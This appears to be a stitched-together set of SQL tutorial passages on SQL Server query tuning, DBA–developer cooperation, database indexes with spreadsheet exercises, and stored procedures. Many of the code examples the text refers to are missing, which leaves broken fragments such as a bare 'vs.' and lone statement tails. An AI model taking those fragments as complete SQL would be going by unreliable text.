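    "SELECT B, A FROM TableName WHERE B IN (1, 2, 3) ORDER BY B").fetchall()
print(total, changed)
```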
Make sure that your WHERE clause avoids updating the stored value if it matches the existing value.
Such a trivial optimization can dramatically increase SQL query performance by updating only hundreds
of rows instead of thousands. For example:
UPDATE TableName
SET A = @VALUE
WHERE
B = 'YOUR CONDITION'
AND A <> @VALUE -- skip rows that already hold the value
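To see how many rows such a predicate saves, the following sketch counts the rows touched with and without it, using Python's sqlite3 module. The four sample rows are made up for the demonstration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE TableName (A TEXT, B TEXT)")
conn.executemany("INSERT INTO TableName VALUES (?, ?)",
                 [("new", "x"), ("old", "x"), ("old", "x"), ("old", "y")])
conn.commit()

value = "new"

# Without the extra predicate, every row with B = 'x' is rewritten.
touched_all = conn.execute(
    "UPDATE TableName SET A = ? WHERE B = 'x'", (value,)).rowcount
conn.rollback()  # undo, so the second variant starts from the same data

# With it, rows that already hold the value are left alone.
touched_needed = conn.execute(
    "UPDATE TableName SET A = ? WHERE B = 'x' AND A <> ?", (value, value)).rowcount
conn.commit()

print(touched_all, touched_needed)
```

Note that a comparison such as A <> value is not true for NULL, so rows where A is NULL would need an explicit IS NULL check if they should also be updated.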
A correlated subquery is one which uses values from the parent query. This kind of SQL query tends to
run row-by-row, once for each row returned by the outer query, and thus decreases SQL query
performance. New SQL developers are often caught structuring their queries in this way—because it’s
usually the easy route.
SELECT c.Name,
c.City,
(SELECT CompanyName FROM Company WHERE CompanyID = c.CompanyID) AS CompanyName
FROM Customer c
In particular, the problem is that the inner query (SELECT CompanyName…) is run for each row returned
by the outer query (SELECT c.Name…). But why go over the Company again and again for every row
processed by the outer query?
A more efficient SQL performance tuning technique would be to refactor the correlated subquery as a
join:
SELECT c.Name,
c.City,
co.CompanyName
FROM Customer c
INNER JOIN Company co
ON c.CompanyID = co.CompanyID
In this case, we go over the Company table just once, at the start, and JOIN it with the Customer table.
From then on, we can select the values we need (co.CompanyName) more efficiently.
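A quick way to convince yourself that the two forms are interchangeable is to run both against the same data. The sketch below does that with Python's sqlite3 module; the sample companies and customers are invented for the test.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Company (CompanyID INTEGER PRIMARY KEY, CompanyName TEXT);
    CREATE TABLE Customer (Name TEXT, City TEXT, CompanyID INTEGER);
    INSERT INTO Company VALUES (1, 'Acme'), (2, 'Globex');
    INSERT INTO Customer VALUES ('Ann', 'Paris', 1), ('Bob', 'Rome', 2), ('Cy', 'Oslo', 1);
""")

correlated = conn.execute("""
    SELECT c.Name, c.City,
           (SELECT CompanyName FROM Company WHERE CompanyID = c.CompanyID) AS CompanyName
    FROM Customer c
    ORDER BY c.Name
""").fetchall()

joined = conn.execute("""
    SELECT c.Name, c.City, co.CompanyName
    FROM Customer c
    INNER JOIN Company co ON c.CompanyID = co.CompanyID
    ORDER BY c.Name
""").fetchall()

print(correlated == joined)
```

One caveat: the two queries differ for customers without a matching company. The subquery version returns them with a NULL company name, while the INNER JOIN drops them; a LEFT JOIN would preserve the original behavior.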
One of my favorite SQL optimization tips is to avoid SELECT *! Instead, you should individually include
the specific columns that you need. Again, this sounds simple, but I see this error all over the place.
Consider a table with hundreds of columns and millions of rows—if your application only really needs a
few columns, there’s no sense in querying for all the data. It’s a massive waste of resources. For
example:
vs.
If you really need every column, explicitly list every column. This isn’t so much a rule, but rather, a means
of preventing future system errors and additional SQL performance tuning. For example, if you’re using
an INSERT... SELECT... and the source table has changed via the addition of a new column, you might
run into issues, even if that column isn’t needed by the destination table, e.g.:
Insert Error: Column name or number of supplied values does not match table definition.
To avoid this kind of error from SQL Server, you should declare each column individually:
FROM OldEmployees
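The failure mode and the fix can be reproduced in miniature with Python's sqlite3 module. The column names below are assumptions, and SQLite words its error differently from the SQL Server message quoted above, but the cause is the same: the number of supplied values no longer matches the destination table.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Employees (FirstName TEXT, City TEXT);
    CREATE TABLE OldEmployees (Name TEXT, CityName TEXT);
    INSERT INTO OldEmployees VALUES ('Ann', 'Paris');
    -- The source table later gains a column the destination does not have.
    ALTER TABLE OldEmployees ADD COLUMN Phone TEXT;
""")

try:
    conn.execute("INSERT INTO Employees SELECT * FROM OldEmployees")
    star_error = None
except sqlite3.OperationalError as exc:
    star_error = str(exc)

# Naming the columns on both sides keeps working after the schema change.
conn.execute("INSERT INTO Employees (FirstName, City) "
             "SELECT Name, CityName FROM OldEmployees")
copied = conn.execute("SELECT FirstName, City FROM Employees").fetchall()
print(star_error)
print(copied)
```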
Note, however, that there are some situations where the use of SELECT * could be appropriate. For
example, with temp tables—which leads us to our next topic.
Temporary tables usually increase a query’s complexity. If your code can be written in a simple,
straightforward manner, I’d suggest avoiding temp tables.
But if you have a stored procedure with some data manipulation that cannot be handled with a single
query, you can use temp tables as intermediaries to help you to generate a final result.
When you have to join a large table and there are conditions on said table, you can increase database
performance by transferring your data in a temp table, and then making a join on that. Your temp table will
have fewer rows than the original (large) table, so the join will finish faster!
The decision isn’t always straightforward, but this example will give you a sense for situations in which
you might want to use temp tables:
Imagine a customer table with millions of records. You have to make a join on a specific region. You can
achieve this by using a SELECT INTO statement and then joining with the temp table:
(Note: some SQL developers also avoid using SELECT INTO to create temp tables, saying that this
command locks the tempdb database, disallowing other users from creating temp tables. Fortunately, this
was fixed in SQL Server 7.0 and later.)
ON t.RegionID = r.RegionID
But wait! There’s a problem with this second query. As described above, we should only be including the
columns we need in our subquery (i.e., not using SELECT *). Taking that into account:
ON t.RegionID = r.RegionID
All of these SQL snippets will return the same data. But with temp tables, we could, for example, create
an index in the temp table to improve performance. There’s some good discussion here on the
differences between temporary tables and subqueries.
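The subquery and temp-table variants can be compared side by side in a small sketch. It uses Python's sqlite3 module, where CREATE TEMP TABLE ... AS SELECT plays the role of SQL Server's SELECT INTO #temp. The Region and Customer layouts, the region id 5, and the names temp_customer and idx_temp_region are assumptions for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Region (RegionID INTEGER PRIMARY KEY, RegionName TEXT);
    CREATE TABLE Customer (Name TEXT, RegionID INTEGER);
    INSERT INTO Region VALUES (5, 'North'), (6, 'South');
    INSERT INTO Customer VALUES ('Ann', 5), ('Bob', 6), ('Cy', 5);
""")

# Subquery form: filter inline, listing only the needed columns.
via_subquery = conn.execute("""
    SELECT r.RegionName, t.Name
    FROM Region r
    JOIN (SELECT Name, RegionID FROM Customer WHERE RegionID = 5) AS t
      ON t.RegionID = r.RegionID
    ORDER BY t.Name
""").fetchall()

# Temp-table form: materialize the filtered rows, index them, then join.
conn.executescript("""
    CREATE TEMP TABLE temp_customer AS
        SELECT Name, RegionID FROM Customer WHERE RegionID = 5;
    CREATE INDEX idx_temp_region ON temp_customer (RegionID);
""")
via_temp = conn.execute("""
    SELECT r.RegionName, t.Name
    FROM Region r
    JOIN temp_customer t ON t.RegionID = r.RegionID
    ORDER BY t.Name
""").fetchall()

conn.execute("DROP TABLE temp_customer")  # release the temp storage early
print(via_subquery == via_temp)
```

Both forms return the same rows. The temp table only pays off when the filtered set is reused or benefits from its own index.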
Finally, when you’re done with your temp table, delete it to clear tempdb resources, rather than just wait
for it to be automatically deleted (as it will be when your connection to the database is terminated):
DROP TABLE #temp
This SQL optimization technique concerns the use of EXISTS(). If you want to check if a record exists,
use EXISTS() instead of COUNT(). While COUNT() scans the entire table, counting up all entries
matching your condition, EXISTS() will exit as soon as it sees the result it needs. This will give you better
performance and clearer code.
PRINT 'YES'
vs.
PRINT 'YES'
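The two existence checks can be compared with a short sketch in Python's sqlite3 module. The Employees table and the name pattern are illustrative assumptions; the PRINT step from the T-SQL version is replaced by reading the 0/1 result.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Employees (FirstName TEXT)")
conn.executemany("INSERT INTO Employees VALUES (?)",
                 [("John",), ("Johnny",), ("Mary",)])

# COUNT tallies every matching row before the comparison can run.
has_john_count = conn.execute(
    "SELECT (SELECT COUNT(*) FROM Employees WHERE FirstName LIKE '%John%') > 0"
).fetchone()[0]

# EXISTS can stop at the first matching row.
has_john_exists = conn.execute(
    "SELECT EXISTS (SELECT 1 FROM Employees WHERE FirstName LIKE '%John%')"
).fetchone()[0]

has_zed = conn.execute(
    "SELECT EXISTS (SELECT 1 FROM Employees WHERE FirstName LIKE '%Zed%')"
).fetchone()[0]

print(has_john_count, has_john_exists, has_zed)
```

Both checks give the same answer. The difference is in how much work the engine has to do to reach it on a large table.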
As DBAs working with SQL Server 2016 are likely aware, the version marked an important shift in
defaults and compatibility management. As a major version, it, of course, comes with new query
optimizations, but control over whether they’re used is now streamlined via
sys.databases.compatibility_level.
SQL database administrators (DBAs) and developers often clash over data- and non-data-related issues.
Drawn from my experience, here are some tips (for both parties) on how to get along and work together
effectively.
Database Optimization for Developers:
If your application stops working suddenly, it may not be a database issue. For example, maybe you have
a network problem. Investigate a bit before you accuse a DBA!
Even if you’re a ninja SQL data modeler, ask a DBA to help you with your relational diagram. They have a
lot to share and offer.
DBAs don’t like rapid changes. This is natural: they need to analyze the database as a whole and
examine the impact of any changes from all angles. A simple change in a column can take a week to be
implemented—but that’s because an error could materialize as huge losses for the company. Be patient!
Do not ask SQL DBAs to make data changes in a production environment. If you want access to the
production database, you have to be responsible for all your own changes.
If you don’t like people asking you about the database, give them a real-time status panel. Developers are
always suspicious of a database’s status, and such a panel could save everyone time and energy.
Help developers in a test/quality assurance environment. Make it easy to simulate a production server
with simple tests on real-world data. This will be a significant time-saver for others as well as yourself.
Developers spend all day on systems with frequently changing business logic. Try to understand this
world by being more flexible, and be able to break some rules in a critical moment.
SQL databases evolve. The day will come when you have to migrate your data to a new version.
Developers count on significant new functionality with each new version. Instead of refusing to accept
their changes, plan ahead and be ready for the migration.
What is an Index?
An index is a data structure associated with a table that provides fast access to rows in a table based on
the values in one or more columns (the index key).
Let's say, you have a customers table in your database and you want to find out all the customers whose
names begin with the letter A, using the following statement.
To find such customers, the server must scan each row one by one in the customers table and inspect the
contents of the name column. This works fine for a table with few rows, but imagine how long it
might take to answer the query if the table contains millions of rows. In such a situation you can speed
things up by applying indexes to the table.
A database index is an important auxiliary data structure helping to speed up data retrieval. The amount
of data accessed to execute an SQL query is the main factor contributing to the execution time. The use
of well-designed indexes minimizes the volume of accessed data.
The main use case is a query returning data based on a condition of the type "column value between X
and Y." An index on the column allows the RDBMS to quickly find the first row satisfying the condition,
read consecutive rows from the given range, and stop without needing to read any other data.
Indexes can be categorized in several ways: by structure (B-tree, hash table, binary,
column-store, full-text, etc.), by whether they are clustered or not, and by whether they are
partitioned (locally, globally, or not at all). Some store entire rows, some store derivative values,
others store straight column copies.
A typical index is implemented using a balanced tree structure. Leaf levels of an index are sorted based
on column values. So, when we want to find all rows with a specific value of an indexed column, we are
able to quickly locate the first one and read consecutive rows as long as they match the value.
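The "locate the first match, then read consecutive entries" idea can be sketched with Python's bisect module. A sorted list stands in for the sorted leaf level here; a real index walks a tree rather than binary-searching an array, and the keys and row ids are made up.

```python
from bisect import bisect_left, bisect_right

# A sorted list of (key, row_id) pairs stands in for the index leaf level.
index = sorted([(30, "r1"), (10, "r2"), (20, "r3"), (20, "r4"), (40, "r5"), (25, "r6")])
keys = [key for key, _ in index]

def range_lookup(low, high):
    """Return row ids whose key lies in [low, high]."""
    start = bisect_left(keys, low)    # jump to the first qualifying entry
    stop = bisect_right(keys, high)   # first entry past the range
    return [row_id for _, row_id in index[start:stop]]

in_range = range_lookup(20, 30)
print(in_range)
```

Entries outside the requested range are never visited, which is why the amount of data read depends on the size of the result rather than the size of the table.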
An appropriate index can significantly reduce the amount of data accessed by a SELECT statement,
which is the main factor contributing to query execution time.
Modern databases often keep and publish massive volumes of data. When a user tries to retrieve just a
small piece of data without an appropriate index, the retrieval (of a needle in a haystack) could take
hours.
Creating an Index
For example, to create an index on the name column in the customers table, you could use:
By default, the index will allow duplicate entries and sort the entries in ascending order. To require unique
index entries, add the keyword UNIQUE after CREATE, like this:
ON customers (cust_name);
You can also build indexes that span multiple columns. For example, suppose you have a table in your
database named users with the columns first_name and last_name, and you frequently access
user records using these columns. You can then build an index on both columns together to improve
performance, as follows:
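The index variants discussed in this section can be exercised with Python's sqlite3 module. The index names cust_name_idx and user_name_idx are hypothetical. Note that SQLite drops an index with DROP INDEX name, while MySQL also requires the table (DROP INDEX name ON table).

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE customers (cust_id INTEGER PRIMARY KEY, cust_name TEXT);
    CREATE TABLE users (first_name TEXT, last_name TEXT);

    -- Unique single-column index: duplicate names are rejected.
    CREATE UNIQUE INDEX cust_name_idx ON customers (cust_name);
    -- Composite index covering both name columns.
    CREATE INDEX user_name_idx ON users (first_name, last_name);

    INSERT INTO customers (cust_name) VALUES ('Ann');
""")

try:
    conn.execute("INSERT INTO customers (cust_name) VALUES ('Ann')")
    duplicate_rejected = False
except sqlite3.IntegrityError:
    duplicate_rejected = True

index_names = sorted(row[0] for row in conn.execute(
    "SELECT name FROM sqlite_master WHERE type = 'index'"))

# An index that is no longer needed can be dropped by name.
conn.execute("DROP INDEX user_name_idx")
print(duplicate_rejected, index_names)
```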
Tip: You can think of a database index as the index section of a book, which helps you quickly find or
locate a specific topic within the book.
Indexes should be created with care, because every time a row is added, updated or removed from a table,
all indexes on that table must be modified. Therefore, the more indexes you have, the more work the
server needs to do, which ultimately leads to slower write performance.
Here are some basic guidelines that you can follow when creating indexes:
Don't create indexes for columns that you never use as retrieval keys.
Index columns that are used for joins to improve join performance.
Also, small tables do not require indexes, because in the case of small tables, it is usually faster for the
server to scan the table rather than look at the index first.
Drop Indexes
You can drop indexes that are no longer required with the following statement.
Properly used, an SQL database index can be so effective that it might seem like magic. But the following
series of exercises will show that underneath, the logic of most SQL indexes—and wielding them correctly
—is quite straightforward.
In this series, SQL Indexes Explained, we will walk through the motivations for using indexes to access
data and for designing indexes in the way it is done by all modern RDBMSes. We will then look at the
algorithms used to return data for specific query patterns.
This isn’t just an SQL index tutorial—it’s a deep dive into understanding the underlying mechanics of
indexes.
We are going to figure out how an RDBMS uses indexes by doing exercises and analyzing our problem-
solving methods. Our exercise material consists of read-only Google Sheets. To do an exercise, you can
copy the Google Sheet (File → Make a copy) or copy its contents into your own Google Sheet.
In every exercise, we’ll show an SQL query that uses Oracle syntax. For dates, we will use the ISO 8601
format, YYYY-MM-DD.
The first task—don’t do it just yet—is to find all rows from the Reservation spreadsheet for a specific client
of a hotel reservation system, and copy them into your own spreadsheet, simulating the execution of the
following query:
SELECT
*
FROM
Reservations
WHERE
ClientID = 12;
For the first try, do not use any sorting or filtering features. Please, record the time spent. The resulting
sheet should contain 73 rows.
This pseudocode illustrates the algorithm for accomplishing the task without sorting:
In this case, we had to check all 841 rows to return and copy 73 rows satisfying the condition.
For the second try, sort the sheet according to the value of the ClientID column. Do not use filters. Record
the time and compare it with the time it took to complete the task without sorting data.
This time, we had to check “only” 780 rows. If we could somehow jump to the first row, it would take even
less time.
But if we had to develop a program for the task, this solution would be even slower than the first
one. That’s because we would have to sort all the data first, which means each row would have to be
accessed at least once. This approach is good only if the sheet is already sorted in the desired order.
Now the task is to count the number of check-ins on the 16th of August 2020:
SELECT
COUNT (*)
FROM
Reservations
WHERE
DateFrom = TO_DATE('2020-08-16', 'YYYY-MM-DD');
Use the spreadsheet from Exercise 1. Measure and compare the time spent completing the task with and
without sorting. The correct count is 91.
For the approach without sorting, the algorithm is basically the same as the one from Exercise 1.
The sorting approach is also similar to the one from the previous exercise. We will just split the loop into
two parts:
Repeat
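One way to read "split the loop into two parts" is sketched below in Python: the first loop skips rows before the target date, the second counts matching rows and stops at the first non-match. The function name and the six sample dates are assumptions. ISO 8601 date strings are used because they sort correctly as plain text.

```python
def count_checkins_sorted(dates, target):
    """dates must be sorted ascending; returns (count, rows_read)."""
    i = 0
    # Part 1: skip rows that come before the target date.
    while i < len(dates) and dates[i] < target:
        i += 1
    # Part 2: count consecutive rows equal to the target, then stop.
    count = 0
    while i < len(dates) and dates[i] == target:
        count += 1
        i += 1
    # The row that ended part 2 (if any) was also read.
    reads = min(i + 1, len(dates))
    return count, reads

dates = sorted(["2020-08-15", "2020-08-16", "2020-08-14",
                "2020-08-16", "2020-08-17", "2020-08-18"])
count, reads = count_checkins_sorted(dates, "2020-08-16")
print(count, reads)
```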
The police inspector requests to see a list of guests that arrived at the hotel on the 13th and 14th of
August 2020.
SELECT
ClientID
FROM
Reservations
WHERE
DateFrom BETWEEN (
TO_DATE('2020-08-13', 'YYYY-MM-DD')
) AND (
TO_DATE('2020-08-14', 'YYYY-MM-DD')
)
AND HotelID = 3;
The inspector wants the list fast. We already know that we’d better sort the table/spreadsheet according
to the date of arrival. If we just finished Exercise 2, we are lucky that the table is already sorted. So, we
apply the approach similar to the one from Exercise 2.
Please, try and record the time, the number of rows you had to read, and the number of items on the list.
Repeat
Using this approach, we had to read 511 rows to compile a list of 46 guests. If we had been able to
jump straight to the right place, we would not have had to perform the 324 reads from the repeat cycle
just to locate the first arrival on the 13th of August. However, we would still have had to read more
than 100 rows to check whether the guest arrived at the hotel with a HotelID of 3.
The inspector waited all that time but would not be happy: Instead of guests’ names and other relevant
data, we only delivered a list of meaningless IDs.
We’ll get back to that aspect later in the series. Let’s first find a way to prepare the list faster.
To sort the rows according to HotelID then DateFrom, we can select all columns, then use the Google
Sheets menu option Data → Sort range.
Repeat
We had to skip the first 338 arrivals before locating the first one to our hotel. After that, we went over 103
earlier arrivals to locate the first on the 13th of August. Finally, we copied 46 consecutive values of
ClientID. It helped us that in the third step, we were able to copy a block of consecutive IDs. Too bad we
couldn’t somehow jump to the first row from that block.
Now try the same exercise using the spreadsheet ordered by HotelID only.
The algorithm applied to the table ordered by HotelID only is less efficient than when we sort by HotelID
and DateFrom (in that order):
Repeat
While HotelID = 3
In this case, we have to read all 166 arrivals to the hotel with a HotelID of 3, and for each, to check if the
DateFrom belongs to the requested interval.
Approach 4: Sorted by Date, Then Hotel
Does it really matter whether we sort first by HotelID and then DateFrom or vice versa? Let’s find out: Try
sorting first by DateFrom, then by HotelID.
Repeat
If HotelID = 3
We located the first row with the relevant date, then read more until we located the first arrival to the hotel.
After that, for a number of rows, both conditions were fulfilled, the correct date and the right hotel.
However, after arrivals in hotel 3, we had arrivals to hotels 4, 5, and so on, for the same date. After them,
we had to again read rows for the next day for hotels 1 and 2, until we were able to read consecutive
arrivals to our hotel of interest.
As we can see, all approaches have a single consecutive block of data in the middle of the complete set
of rows, representing partially matched data. Approaches 2 and 4 are the only ones where logic allows us
to stop the algorithm entirely before we reach the end of the partial matches.
Approach 4 has fully matched data in two blocks, but Approach 2 is the only one where the targeted data
is all in one consecutive block.
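The difference between Approach 2 and Approach 4 can be simulated in Python. The arrivals below are randomly generated, not the article's spreadsheet, and the helper names are hypothetical. Each scan reads rows in sort order and stops as soon as no further match is possible.

```python
import random

random.seed(1)
days = [f"2020-08-{d:02d}" for d in range(10, 18)]
# Synthetic arrivals as (HotelID, DateFrom, ClientID); not the article's data.
rows = [(random.randint(1, 5), random.choice(days), cid) for cid in range(400)]

def wanted(row):
    return row[0] == 3 and "2020-08-13" <= row[1] <= "2020-08-14"

def scan(sorted_rows, past_range):
    """Read rows in order until past_range(row) says no match can follow."""
    found, reads = [], 0
    for row in sorted_rows:
        reads += 1
        if past_range(row):
            break
        if wanted(row):
            found.append(row[2])
    return sorted(found), reads

# Approach 2: HotelID, then DateFrom. Matches form one consecutive block.
by_hotel_date = sorted(rows, key=lambda r: (r[0], r[1]))
ids_2, reads_2 = scan(by_hotel_date, lambda r: (r[0], r[1]) > (3, "2020-08-14"))

# Approach 4: DateFrom, then HotelID. Matches fall into one block per day.
by_date_hotel = sorted(rows, key=lambda r: (r[1], r[0]))
ids_4, reads_4 = scan(by_date_hotel, lambda r: (r[1], r[0]) > ("2020-08-14", 3))

expected = sorted(r[2] for r in rows if wanted(r))
print(reads_2, reads_4, len(expected))
```

Both orders return the same ClientIDs and both can stop early. Only the first order keeps all matching rows adjacent, which is what would let an index jump to the block and read it in one pass.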
If a table is not already sorted, sorting takes more time than reading from an unsorted table.
Finding a way to jump to the first row matching a search condition within the sorted table would save a lot
of reads.
Maintaining the sorted copies of the table for the most frequent queries would be helpful.
Now, a sorted copy of a table sounds almost like a database index. The next article in SQL Indexes
Explained covers a rudimentary index implementation. Thanks for reading!
Kevin Bloch (https://www.toptal.com/sql-server/sql-database-tuning-for-developers)
What Are Stored Procedures
Stored procedures (SPs) in SQL Server are just like procedures/routines in other DBMSs or
programming languages. Each procedure has one or more statements. In our case, these are SQL
statements. So, you can write a procedure that will insert new data, update or delete existing
data, or retrieve data using the SELECT statement. Even better, you can combine several different
statements in one stored procedure. Also, inside the procedure, you can call another SP or a
function, use the IF statement, etc. Therefore, it’s pretty obvious that an SP can do much more
than a single select query.
The main idea is to write down the procedure performing all the operations we want, and later,
when needed, call this procedure using parameters. Therefore, an SP for the end-user would be
like a black box, receiving input and returning the output.
We’ve used the DROP PROCEDURE IF EXISTS p_customer_all; statement in the first line. This is
good practice, especially when you’re creating scripts that you want to work every time, no matter
the state of the database. The command DROP PROCEDURE p_customer_all; would delete the
procedure with the given name. Still, if the procedure hadn’t already been created in the database,
this would result in an error. Adding IF EXISTS (available from SQL Server 2016) prevents this
from happening. This line essentially says: I will delete this procedure if it’s on the server,
and if it is not present, do nothing
The word GO separates batches of SQL statements; it is needed in situations like this one because
CREATE PROCEDURE must be the first statement in its batch
The name of our procedure is p_customer_all. The reason for that is as follows – “p” is for the
procedure, followed by the table name (customer) and the action we’ll use this procedure for
(return all)
The body of the procedure is just a simple select statement returning all rows from this table
After the procedure is created, you can see it in the Object Explorer, under Programmability ->
Stored Procedures.
Let’s now call/execute our SP.
To do this, we’ll use the syntax: EXEC procedure_name <parameters if any>;. So, our statement
is:
For the procedure that will return only one row based on the id, the code is:
What’s new here is that we pass a parameter to the procedure. We can pass one or more
parameters. We list them all after the procedure name in the CREATE PROCEDURE line
(CREATE PROCEDURE p_customer (@id INT)).
Let’s now create a procedure that will insert a new customer in the table.
the new row was added. We’ll check what is in the table by calling the first procedure we’ve
created:
The last procedure we’ll analyze today is the one that deletes a row using the id passed as a
parameter. Let’s create the procedure first.
Once again, we’ve followed the same naming convention when giving the name to our
procedure. We pass only 1 parameter and that is the id of the row to delete. Let’s call the
procedure now:
This deleted the row with id 6. Let’s check it again, using our first procedure:
We’ve seen 4 examples of how we could use SPs to perform simple database operations. In
upcoming articles, we’ll go with more complex stored procedures. But before we do that, let’s
comment on the advantages SPs have.
Modular programming – If you decide to put all logic inside SPs, you’ll be able to easily
create/identify the modules/parts of your code in charge of different business operations in your
system. This requires using a good naming convention and sticking to internal rules, but
the benefits are really great. When you need to change something, you will be able to find the
related code faster. When you change that code (SP), the change is immediately visible in
all places where this SP is called
Better performance – Stored procedures are parsed and optimized after they are created. Since
they are stored, there is no need to parse and optimize them again, as would be the case
when not using them. This saves some time when executing the queries inside the SP
Reducing network traffic – This might not be as important as the others, but is still an advantage.
When you call an SP, you pass only its name and parameters. Otherwise, you’d need to send all the
lines of code. If the SP is pretty complex, this has a larger impact
Security – This one is very important. Just as with other database objects, you can define who
can access them and how they can use these objects. You can grant a user permission to
execute an SP, even if they don’t have permission to use all the tables in that procedure. That way,
you’ll be able to limit users to only those objects you want them to use. Besides that, a
potential attacker won’t be able to see the structure of your database in the code; they’ll only
see the name of the SP you’re calling
Conclusion
Today we took a look at another very important database object we have at our disposal: the stored
procedure. Stored procedures offer a number of advantages. Maybe the biggest disadvantage is that
you need to take care of a large number of procedures and have a procedure for everything,
from the simplest to very complex tasks. Still, a good naming convention and internal
organization could easily turn this disadvantage into an advantage (by forcing you to follow the
same standards and principles in the whole system and by simplifying the documentation, which
greatly increases the chance that you’ll actually write it).